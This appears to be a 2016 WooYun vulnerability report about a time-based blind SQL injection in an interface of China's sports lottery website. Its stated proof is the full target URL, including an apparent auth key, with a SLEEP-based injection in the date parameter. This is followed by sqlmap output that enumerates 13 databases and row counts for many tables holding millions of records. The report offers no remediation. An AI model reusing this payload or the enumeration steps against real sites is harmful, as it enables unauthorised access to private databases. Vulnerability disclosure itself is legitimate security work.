漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:竞彩网某接口注入涉及3000W数据
提交时间:2016-04-01 11:21
修复时间:2016-05-16 11:30
公开时间:2016-05-16 11:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2016-04-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 中国竞彩网是中国体育采彡PIAO竞猜游戏官方信息发布平台。
详细说明: http://info.sporttery.cn/interface/interface_new.php?a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json
漏洞证明:
Parameter: date (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: a=contents_list&auth_type=key&auth_value=4u5j7k8l-1e3c-d3r6-7t9k-g7h1-4f6f7f3e&date=2011-03-29' AND (SELECT * FROM (SELECT(SLEEP(5)))KHZL)and '9270'='9270&dpc=1&format=json --- [20:55:47] [INFO] the back-end DBMS is MySQL web application technology: Apache, Apache 2.2.29, PHP 5.3.29 back-end DBMS: MySQL 5.0.12 [20:55:47] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables [20:55:47] [INFO] fetching database names [20:55:47] [INFO] fetching number of databases [20:55:47] [INFO] resumed: 13 [20:55:47] [INFO] resumed: information_schema [20:55:47] [INFO] resumed: account [20:55:47] [INFO] resumed: account_log [20:55:47] [INFO] resumed: cms_plus [20:55:47] [INFO] resumed: comments [20:55:47] [INFO] resumed: data_center [20:55:47] [INFO] resumed: datacenter [20:55:47] [INFO] resumed: lottery_cms_plus [20:55:47] [INFO] resumed: mysql [20:55:47] [INFO] resumed: sporttery [20:55:47] [INFO] resumed: star [20:55:47] [INFO] resumed: test [20:55:47] [INFO] resumed: virtual_soccer Database: sporttery +---------------------------------------+---------+ | Table | Entries | +---------------------------------------+---------+ | cdn_apache_log | 82547955 | | tip_fb_three | 79317100 | | lottery_vote_history | 33330578 | | tip_fb_asia | 28484126 | | tc_site_time | 20834026 | | tc_win007_detail | 14306822 | | tc_goal_detail | 8345684 | | tc_goal_change | 4953919 | | tip_bk_two | 4760247 | | fb_spvalue_hhad | 4213724 | | tc_7m_detail | 4131791 | | match_vote | 3036335 | | wx_receive_log | 2953996 | | tip_fb_asia_count | 2800716 | | tip_bk_hdc | 2205138 | | tc_win007_change | 1630263 | | fb_spvalue_crs | 1595340 | | tc_win007_league | 1587009 | | tip_bk_total | 1504659 | | fb_spvalue_ttg | 1387881 | | fb_spvalue_had | 1258856 | | tc_7m_league | 1241455 |
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)